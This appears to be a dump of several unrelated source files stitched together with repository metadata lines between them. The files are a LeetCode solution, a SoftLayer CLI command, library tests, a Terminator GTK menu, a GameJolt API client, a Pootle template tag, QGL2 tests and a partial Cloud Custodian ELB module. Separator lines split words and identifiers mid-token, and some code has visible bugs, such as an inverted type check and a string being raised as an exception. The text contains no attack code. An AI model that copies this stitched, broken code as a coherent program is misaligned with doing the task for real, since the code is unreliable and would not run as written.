# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
# """
import unittest
# 20ms 100%
class NestedInteger(object):
def isInteger(self):
"""
@return True if this NestedInteger holds a single integer, rather than a nested list.
:rtype bool
"""
def getInteger(self):
"""
@return the single integer that this NestedInteger holds, if it holds a single integer
Return None if this NestedInteger holds a nested list
:rtype int
"""
def getList(self):
"""
@return the nested list that this NestedInteger holds, if it holds a nested list
Return None if this NestedInteger holds a single integer
:rtype List[NestedInteger]
"""
class Solution(object):
def depthSum(self, nestedList):
"""
:type nestedList: List[NestedInteger]
:rtype: int
"""
def depthSumHelper(nestedList, depth):
res = 0
for l in nestedList:
if l.isInteger():
res += l.getInteger() * depth
else:
res += depthSumHelper(l.getList(), depth + 1)
return res
return depthSumHelper(nestedList, 1)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
Thought: https://leetcode.com/problems/nested-list-weight-sum/solution/
/**
* // This is the interface that allows for creating nested lists.
* // You should not implement it, or speculate about its implementation
* public interface NestedInteger {
*
* // @return true if this NestedInteger holds a single integer, rather than a nested list.
* public boolean isInteger();
*
* // @return the single integer that this NestedInteger holds, if it holds a single integer
* // Return null if this NestedInteger holds a nested list
* public Integer getInteger();
*
* // @return the nested list that this NestedInteger holds, if it holds a nested list
* // Return null if this NestedInteger holds a single integer
* public List<NestedInteger> getList();
* }
*/
1. DFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
return dfs(nestedList, 1);
}
public int dfs(List<NestedInteger> nestedList, int depth) {
int sum = 0;
for (NestedInteger e : nestedList) {
|
sum += e.isInteger() ? e.getInteger() * depth : dfs(e.getList(), depth + 1);
}
return sum;
}
}
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
for (NestedInteger ni
|
: nestedList) {
sum += depthSum(ni, 1);
}
return sum;
}
private int depthSum(NestedInteger ni, int depth) {
if (ni.isInteger()) {
return ni.getInteger() * depth;
} else {
int sum = 0;
for (NestedInteger n : ni.getList()) {
sum += depthSum(n, depth + 1);
}
return sum;
}
}
}
2. BFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
Queue<NestedInteger> queue = new LinkedList<>();
int depth = 1;
for (NestedInteger ni : nestedList) {
queue.add(ni);
}
while (!queue.isEmpty()) {
int size = queue.size();
while (size-- > 0) {
NestedInteger cur = queue.poll();
if (cur.isInteger()) {
sum += cur.getInteger() * depth;
} else {
for (NestedInteger ni : cur.getList()) {
queue.add(ni);
}
}
}
depth++;
}
return sum;
}
}
'''
|
briancline/softlayer-python
|
SoftLayer/CLI/rwhois/edit.py
|
Python
|
mit
| 1,891
| 0
|
"""Edit the RWhois data on the account."""
# :license: MIT, see LICENSE for more details.
import SoftLayer
from SoftLayer.CLI import environment
from S
|
oftLayer.CLI import exceptions
import click
@click.command()
@click.option('--abuse', help='Set the abuse email address')
@click.option('--address1', help='Update the address 1 field')
@click.option('--address2', help='Update the address 2 field')
@click.option('--city', help='Set the city name')
@click.option('--company', help='Set the company name')
@click.option('--country', help='Set the two-letter country code')
@cli
|
ck.option('--firstname', help='Update the first name field')
@click.option('--lastname', help='Update the last name field')
@click.option('--postal', help='Set the postal code field')
@click.option('--public/--private',
default=None,
help='Flags the address as a public or private residence.')
@click.option('--state', help='Set the two-letter state code')
@environment.pass_env
def cli(env, abuse, address1, address2, city, company, country, firstname,
lastname, postal, public, state):
"""Edit the RWhois data on the account."""
mgr = SoftLayer.NetworkManager(env.client)
update = {
'abuse_email': abuse,
'address1': address1,
'address2': address2,
'company_name': company,
'city': city,
'country': country,
'first_name': firstname,
'last_name': lastname,
'postal_code': postal,
'state': state,
'private_residence': public,
}
if public is True:
update['private_residence'] = False
elif public is False:
update['private_residence'] = True
check = [x for x in update.values() if x is not None]
if not check:
raise exceptions.CLIAbort(
"You must specify at least one field to update.")
mgr.edit_rwhois(**update)
|
rero/reroils-app
|
tests/ui/locations/test_locations_mapping.py
|
Python
|
gpl-2.0
| 1,616
| 0
|
# -*- coding: utf-8 -*-
#
# RERO ILS
# Copyright (C) 2019 RERO
#
# This program is free software: you can re
|
dis
|
tribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Libraries elasticsearch mapping tests."""
from utils import get_mapping
from rero_ils.modules.locations.api import Location, LocationsSearch
def test_location_es_mapping(es, db, loc_public_martigny_data,
lib_martigny, org_martigny):
"""Test library elasticsearch mapping."""
search = LocationsSearch()
mapping = get_mapping(search.Meta.index)
assert mapping
loc = Location.create(
loc_public_martigny_data, dbcommit=True, reindex=True, delete_pid=True)
new_mapping = get_mapping(search.Meta.index)
assert mapping == new_mapping
loc.delete(force=True, dbcommit=True, delindex=True)
def test_location_search_mapping(app, locations_records):
"""Test library search mapping."""
search = LocationsSearch()
c = search.query('match', code='MARTIGNY-PUBLIC').count()
assert c == 1
c = search.query('match', code='SAXON-PUBLIC').count()
assert c == 1
|
wpjunior/terminator
|
terminatorlib/terminal_popup_menu.py
|
Python
|
gpl-2.0
| 11,983
| 0.004423
|
#!/usr/bin/env python2
# Terminator by Chris Jones <[email protected]>
# GPL v2 only
"""terminal_popup_menu.py - classes necessary to provide a terminal context
menu"""
import string
from gi.repository import Gtk
from version import APP_NAME
from translation import _
from encoding import TerminatorEncoding
from terminator import Terminator
from util import err, dbg
from config import Config
from prefseditor import PrefsEditor
import plugin
class TerminalPopupMenu(object):
"""Class implementing the Terminal context menu"""
terminal = None
terminator = None
config = None
def __init__(self, terminal):
"""Class initialiser"""
self.terminal = terminal
self.terminator = Terminator()
self.config = Config()
def show(self, widget, event=None):
"""Display the context menu"""
terminal = self.terminal
menu = Gtk.Menu()
self.popup_menu = menu
url = None
button = None
time = None
self.config.set_profile(terminal.get_profile())
if event:
|
url = terminal.vte.match_check_event(event)
button = event.button
time = event.time
else:
time = 0
button = 3
if url and url[0]:
dbg("URL matches id: %d" % url[1])
if not url[1] in terminal.matches.values():
err("Unknown URL match id: %d" % url[1])
dbg("Available matches: %s" % terminal.matches)
nameopen = None
namecopy =
|
None
if url[1] == terminal.matches['email']:
nameopen = _('_Send email to...')
namecopy = _('_Copy email address')
elif url[1] == terminal.matches['voip']:
nameopen = _('Ca_ll VoIP address')
namecopy = _('_Copy VoIP address')
elif url[1] in terminal.matches.values():
# This is a plugin match
for pluginname in terminal.matches:
if terminal.matches[pluginname] == url[1]:
break
dbg("Found match ID (%d) in terminal.matches plugin %s" %
(url[1], pluginname))
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('url_handler')
for urlplugin in plugins:
if urlplugin.handler_name == pluginname:
dbg("Identified matching plugin: %s" %
urlplugin.handler_name)
nameopen = _(urlplugin.nameopen)
namecopy = _(urlplugin.namecopy)
break
if not nameopen:
nameopen = _('_Open link')
if not namecopy:
namecopy = _('_Copy address')
icon = Gtk.Image.new_from_stock(Gtk.STOCK_JUMP_TO,
Gtk.IconSize.MENU)
item = Gtk.ImageMenuItem.new_with_mnemonic(nameopen)
item.set_property('image', icon)
item.connect('activate', lambda x: terminal.open_url(url, True))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(namecopy)
item.connect('activate',
lambda x: terminal.clipboard.set_text(terminal.prepare_url(url), len(terminal.prepare_url(url))))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Copy'))
item.connect('activate', lambda x: terminal.vte.copy_clipboard())
item.set_sensitive(terminal.vte.get_has_selection())
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Paste'))
item.connect('activate', lambda x: terminal.paste_clipboard())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split H_orizontally'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_horiz', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-horiz',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split V_ertically'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_vert', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-vert',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Tab'))
item.connect('activate', lambda x: terminal.emit('tab-new', False,
terminal))
menu.append(item)
if self.terminator.debug_address is not None:
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Debug Tab'))
item.connect('activate', lambda x:
terminal.emit('tab-new', True, terminal))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Close'))
item.connect('activate', lambda x: terminal.close())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
sensitive = not terminal.get_toplevel() == terminal.get_parent()
item = Gtk.MenuItem.new_with_mnemonic(_('_Zoom terminal'))
item.connect('activate', terminal.zoom)
item.set_sensitive(sensitive)
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Ma_ximize terminal'))
item.connect('activate', terminal.maximise)
item.set_sensitive(sensitive)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
else:
item = Gtk.MenuItem.new_with_mnemonic(_('_Restore all terminals'))
item.connect('activate', terminal.unzoom)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if self.config['show_titlebar'] == False:
item = Gtk.MenuItem.new_with_mnemonic(_('Grouping'))
submenu = self.terminal.populate_group_menu()
submenu.show_all()
item.set_submenu(submenu)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.CheckMenuItem.new_with_mnemonic(_('Show _scrollbar'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', lambda x: terminal.do_scrollbar_toggle())
menu.append(item)
item = gtk.CheckMenuItem(_('Toggle tab visibility'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', self.toggle_tab_visibility)
menu.append(item)
if hasattr(Gtk, 'Builder'): # VERIFY FOR GTK3: is this ever false?
item = Gtk.MenuItem.new_with_mnemonic(_('_Preferences'))
item.connect('activate', lambda x: PrefsEditor(self.terminal))
menu.append(item)
profilelist = sorted(self.config.list_profiles(), key=string.lower)
if len(profilelist) > 1:
item = Gtk.MenuItem.new_with_mnemonic(_('Profiles'))
submenu = Gtk.Menu()
item.set_submenu(submenu)
menu.append(item)
current = terminal.get_profile()
group = None
for profile in profilelist:
profile_label = profile
if profile_label == 'default':
profile_label = profile.capitalize()
item = Gtk.RadioMenuItem(profile_label, group)
if profile == current:
|
yaelatletl/gj_e3d_api
|
py_gjapi.py
|
Python
|
lgpl-3.0
| 13,032
| 0.028392
|
# Game Jolt Trophy for Python
# by viniciusepiplon - [email protected]
# version 1.1
# Python 3.x stable
# Python 2.7 unstable
# This is a general Python module for manipulating user data and
# trophies (achievments) on GameJolt.
# Website: www.gamejolt.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/lgpl.txt>.
import sys
import hashlib
import json
if sys.hexversion > 0x03000000:
try:
import urllib.request
except:
raise ImportError
else:
try:
import urllib
except:
raise ImportError
class GameJoltTrophy(object):
"""
The Class constructors.
The class requires four essential parameters: user name, user token, game ID
and private code. Check the API documentation on Game Jolt's website to see
what those parameters they are. In this code, I used the same names on the
site. If you read it, you can understand what's going on here.
Note that *username* and *user token* can be changed later, but the game id
and the private key must be defined first, as they won't change.
"""
def __init__(self, username, user_token, game_id, private_key):
super(GameJoltTrophy, self).__init__()
self.username = username
self.user_token = user_token
self.game_id = game_id
self.private_key = private_key
self.URL = 'http://gamejolt.com/api/game/v1'
self.nativeTraceback = False
#====== TOOLS ======#
# Used for changing users, setting and/or fixing authentications
def changeUsername(self, username):
"""
Changes the *username* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.username = username
#
def changeUserToken(self, user_token):
"""
Changes the *user token* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.user_token = user_token
def setSignatureAndgetJSONResponse(self, URL):
"""
Generates a signature from the url and returns the same address, with the
signature added to it.
All singatures are generated with md5, but can be modified below.
This is the only function that generates the signature, so changing the
encoding to SHA1 or other format will affect all URL requests.
"""
if sys.hexversion > 0x03000000:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.request.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
else:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
def setNativeTraceback(self, value):
if not type(value) == bool: self.nativeTraceback = value
else: raise TypeError
#====== USERS ======#
def fetchUserInfo(self):
"""
Fetches the infos of a user as a dictionary type.
**ATTENTION**: it returns a dictionary type value with the key *users*,
containing the user being fetched.
Right now it only fetches the user stored in the object, but can retrive a
list of users. This is not available now, will be implemented later.
"""
URL = self.URL+'/users/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)
return self.setSignatureAndgetJSONResponse(URL)
def authenticateUser(self):
"""
Authenticate a user defined in the object variable.
The purpose of this method is to check if the user's credential
(name and token) are valid. Then, you're safe to call the other methods
Return a boolean type value.
"""
URL = self.URL+'/users/auth/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)+\
'&'+'user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
#====== TROPHIES ======#
def fetchTrophy(self, achieved=None, trophy=None):
"""
The 'trophy' argument receives a list of one or more ID of trophies to be
returned. It ignores the 'achieved' argument, so pass a 'None' value to it.
where you pass the desired number between the braces, separating each trophy
ID with commas.
If 'achieved' is:
> set to True, only the achieved trophies will be returned
> set to False, only trophies that the user hasn't achieved yet will be
returned
> set to None (no argument is passed), then all trophies will be retrieved
"""
URL = self.URL+'/trophies/?format=json&'+\
'game_id='+str(self.game_id)+'&'+'username='+str(self.username)+'&'+'user_token='+str(self.user_token)
if achieved != None:
URL += '&achieved='
if achieved == True: URL += 'true'
if achieved == False: URL += 'false'
else:
if trophy != None:
if type(trophy) == int:
URL += '&trophy_id='+str(trophy)+'&'
elif type(trophy) == list:
miniurl = '&trophy_id='
for t in trophy:
miniurl += str(t)+','
miniurl = miniurl[:1]
URL += miniurl
else:
raise 'Invalid type for trophy: must be int or list.'
return self.setSignatureAndgetJSONResponse(URL)
def addAchieved(self, trophy_id):
"""
Sets a winning trophy for the user.
If the parameters are valid, returns True. Otherwise, it returns False.
"""
URL = self.URL+'/trophies/add-achieved/?'+\
'game_id='+str(self.game_id)+'&'+'user_token='+str(self.user_token)+'&'+'username='+str(self.username)+\
'&'+'trophy_id='+str(trophy_id)
try:
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
except Exception as error:
return {'success': 'false', 'message': str(error)}
#====== SCORES ======#
def fetchScores(self, limit=10, table_id=None, user_info_only=False):
"""
The *limit* argument is set to 10 by default, but can't be more than 100. If
you pass a higher number, the method will automatically set to the maximum
size.
*table_id* if for returning scores for a specific table. If no arguments are
passed (None), it will return all the tables avaliable.
If *user_info_
|
only* is set to True, only scores for the player stored on the
object will be returned.
"""
URL = self.URL+'/scores/?format=json&game_id='+str(self.game_id)
if user_info_only:
URL += '&username='+str(self.us
|
ername)+'&user_token='+str(self.user_token)
# ID of the score table
if table_id:
URL += '&table_id='+str(table_id)
# Maximum number of scores should be 100 according with the GJAPI
if limit > 100:
limit = 100
URL += '&limit='+str(limit)
return self.setSignatureAndgetJSONResponse(URL)
def addScores(self, score, sort, table_id=None, extra_data='', guest=False, guestname=''):
"""
This method adds a score to the player or guest.
*score* is a string value describing the score value.
*sort* is the actual score value, a number value. But can be a string too.
For *table_id*, check the fetchScores method.
*extra_data* is a string value with any data you would like to store. It
doesn't appear on the site.
If you want to store a score for a guest instead of the user, you:
> set True to 'guest' parameter.
> set a string value with the name of the guest on 'guestname'
"""
URL = self.URL+'/scores/add/?format=json&g
|
arky/pootle-dev
|
pootle/apps/pootle_terminology/templatetags/terminology_tags.py
|
Python
|
gpl-2.0
| 1,119
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009, 2013 Zuza Software Foundation
#
# This file is part of Pootle.
#
# Pootle is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of
|
the License, or (at your option) any later
# version.
#
# Pootle is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Gener
|
al Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# Pootle; if not, see <http://www.gnu.org/licenses/>.
from django import template
register = template.Library()
@register.inclusion_tag('terminology/term_edit.html', takes_context=True)
def render_term_edit(context, form):
template_vars = {
'unit': form.instance,
'form': form,
'language': context['language'],
'source_language': context['source_language'],
}
return template_vars
|
BBN-Q/pyqgl2
|
test/test_basic_mins.py
|
Python
|
apache-2.0
| 34,859
| 0.004131
|
# Copyright 2016 by Raytheon BBN Technologies Corp. All Rights Reserved.
'''
Test the qgl2/basic_sequences to ensure they replicate the QGL1 functionality.
'''
import datetime
import unittest
import numpy as np
from math import pi
import random
from pyqgl2.main import compile_function
from pyqgl2.qreg import QRegister
from QGL import *
from test.helpers import testable_sequence, \
channel_setup, assertPulseSequenceEqual, \
get_cal_seqs_1qubit, get_cal_seqs_2qubits, \
stripWaitBarrier, flattenPulseBlocks
class TestAllXY(unittest.TestCase):
def setUp(self):
channel_setup()
def test_AllXY(self):
# QGL1 uses QubitFactory, QGL2 uses QRegister
q1 = QubitFactory('q1')
qr = QRegister(q1)
# Specify the QGL1 we expect QGL2 to generate
# Note in this case we specify only a sample of the start
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)), # aka init(q1) aka Wait(q1)
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
# To turn on verbose logging in compile_function
# from pyqgl2.ast_util import NodeError
# from pyqgl2.debugmsg import DebugMsg
# NodeError.MUTE_ERR_LEVEL = NodeError.NODE_ERROR_NONE
# DebugMsg.set_level(0)
# Now compile the QGL2 to produce the function that would generate the expected sequence.
# Supply the path to the QGL2, the main function in that file, and a list of the args to that function.
# Can optionally supply saveOutput=True to save the qgl1.py
# file,
# and intermediate_output="path-to-output-file" to save
# intermediate products
resFunction = compile_function("src/python/qgl2/basic_sequences/AllXY.py",
"AllXY",
(qr,))
# Run the QGL2. Note that the generated function takes no arguments itself
seqs = resFunction()
# Transform the returned sequences into the canonical form for comparing
# to the explicit QGL1 version above.
# EG, 'flatten' any embedded lists of sequences.
seqs = testable_sequence(seqs)
# Assert that the QGL1 is the same as the generated QGL2
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# Tests list of lists of function references, instead of sub-functions
def test_AllXY_alt1(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
def test_AllXY_alt2(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY2",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# BlankingSweeps are OBE, so not tested
class TestCR(unittest.TestCase):
def setUp(self):
channel_setup()
def test_PiRabi(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
controlQR = QRegister(controlQ)
targetQR = QRegister(targetQ)
edge = EdgeFactory(controlQ, targetQ)
lengths = np.linspace(0, 4e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats = 2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
|
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
calseq = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += calseq
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"PiRabi", (controlQR, targetQR, lengths, riseFall, amp, phase, calRepeats))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRLen(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1') # Equivalent to QRegister(controlQ)
tR = QRegister('q2')
# FIXME: Better values!?
lengths = np.linspace(0, 2e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats=2
canc_amp=0
canc_phase=np.pi/2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Id(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += cal_seqs
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"EchoCRLen",
(cR, tR, lengths, riseFall, amp, phase, calRepeats, canc_amp, canc_phase) )
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRPhase(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1')
tR = QRegister('q2')
phases = np.linspace(0, pi/2, 11)
riseFall=40e-9
amp=1
length=100e-9
|
|
scotwk/cloud-custodian
|
c7n/resources/elb.py
|
Python
|
apache-2.0
| 29,736
| 0.000303
|
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Elastic Load Balancers
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from concurrent.futures import as_completed
import logging
import re
from botocore.exceptions import ClientError
from c7n.actions import ActionRegistry, BaseAction, ModifyVpcSecurityGroupsAction
from c7n.filters import (
Filter, FilterRegistry, FilterValidationError, DefaultVpcBase, ValueFilter,
ShieldMetrics)
import c7n.filters.vpc as net_filters
from datetime import datetime
from dateutil.tz import tzutc
from c7n import tags
from c7n.manager import resources
from c7n.query import QueryResourceManager, DescribeSource
from c7n.utils import local_session, chunks, type_schema, get_retry, worker
from c7n.resources.shield import IsShieldProtected, SetShieldProtection
log = logging.getLogger('custodian.elb')
filters = FilterRegistry('elb.filters')
actions = ActionRegistry('elb.actions')
actions.register('set-shield', SetShieldProtection)
filters.register('tag-count', tags.TagCountFilter)
filters.register('marked-for-op', tags.TagActionFilter)
filters.register('shield-enabled', IsShieldProtected)
filters.register('shield-metrics', ShieldMetrics)
@resources.register('elb')
class ELB(QueryResourceManager):
class resource_type(object):
service = 'elb'
type = 'loadbalancer'
enum_spec = ('describe_load_balancers',
'LoadBalancerDescriptions', None)
detail_spec = None
id = 'LoadBalancerName'
filter_name = 'LoadBalancerNames'
filter_type = 'list'
name = 'DNSName'
date = 'CreatedTime'
dimension = 'LoadBalancerName'
config_type = "AWS::ElasticLoadBalancing::LoadBalancer"
default_report_fields = (
'LoadBalancerName',
'DNSName',
'VPCId',
'count:Instances',
'list:ListenerDescriptions[].Listener.LoadBalancerPort')
filter_registry = filters
action_registry = actions
retry = staticmethod(get_retry(('Throttling',)))
@classmethod
def get_permissions(cls):
return ('elasticloadbalancing:DescribeLoadBalancers',
'elasticloadbalancing:DescribeLoadBalancerAttributes',
'elasticloadbalancing:DescribeTags')
def get_arn(self, r):
return "arn:aws:elasticloadbalancing:%s:%s:loadbalancer/%s" % (
|
self.config.region,
self.config.account_id,
r[self.resource_type.id])
def get_source(self, source_type):
if source_type == 'describe':
return DescribeELB(self)
return super(ELB, self).get_source(source_type)
class DescribeELB(DescribeSource):
def augment(self, resources):
_elb_tags(
resources,
self.manager.session_factory,
self.manager.executor_factory,
|
self.manager.retry)
return resources
def _elb_tags(elbs, session_factory, executor_factory, retry):
def process_tags(elb_set):
client = local_session(session_factory).client('elb')
elb_map = {elb['LoadBalancerName']: elb for elb in elb_set}
while True:
try:
results = retry(
client.describe_tags,
LoadBalancerNames=list(elb_map.keys()))
break
except ClientError as e:
if e.response['Error']['Code'] != 'LoadBalancerNotFound':
raise
msg = e.response['Error']['Message']
_, lb_name = msg.strip().rsplit(' ', 1)
elb_map.pop(lb_name)
if not elb_map:
results = {'TagDescriptions': []}
break
continue
for tag_desc in results['TagDescriptions']:
elb_map[tag_desc['LoadBalancerName']]['Tags'] = tag_desc['Tags']
with executor_factory(max_workers=2) as w:
list(w.map(process_tags, chunks(elbs, 20)))
@actions.register('mark-for-op')
class TagDelayedAction(tags.TagDelayedAction):
"""Action to specify an action to occur at a later date
:example:
.. code-block:: yaml
policies:
- name: elb-delete-unused
resource: elb
filters:
- "tag:custodian_cleanup": absent
- Instances: []
actions:
- type: mark-for-op
tag: custodian_cleanup
msg: "Unused ELB - No Instances: {op}@{action_date}"
op: delete
days: 7
"""
batch_size = 1
permissions = ('elasticloadbalancing:AddTags',)
def process_resource_set(self, resource_set, tags):
client = local_session(self.manager.session_factory).client('elb')
client.add_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=tags)
@actions.register('tag')
class Tag(tags.Tag):
"""Action to add tag(s) to ELB(s)
:example:
.. code-block:: yaml
policies:
- name: elb-add-owner-tag
resource: elb
filters:
- "tag:OwnerName": missing
actions:
- type: tag
key: OwnerName
value: OwnerName
"""
batch_size = 1
permissions = ('elasticloadbalancing:AddTags',)
def process_resource_set(self, resource_set, tags):
client = local_session(
self.manager.session_factory).client('elb')
client.add_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=tags)
@actions.register('remove-tag')
class RemoveTag(tags.RemoveTag):
"""Action to remove tag(s) from ELB(s)
:example:
.. code-block:: yaml
policies:
- name: elb-remove-old-tag
resource: elb
filters:
- "tag:OldTagKey": present
actions:
- type: remove-tag
tags: [OldTagKey1, OldTagKey2]
"""
batch_size = 1
permissions = ('elasticloadbalancing:RemoveTags',)
def process_resource_set(self, resource_set, tag_keys):
client = local_session(
self.manager.session_factory).client('elb')
client.remove_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=[{'Key': k for k in tag_keys}])
@actions.register('delete')
class Delete(BaseAction):
"""Action to delete ELB(s)
It is recommended to apply a filter to the delete policy to avoid unwanted
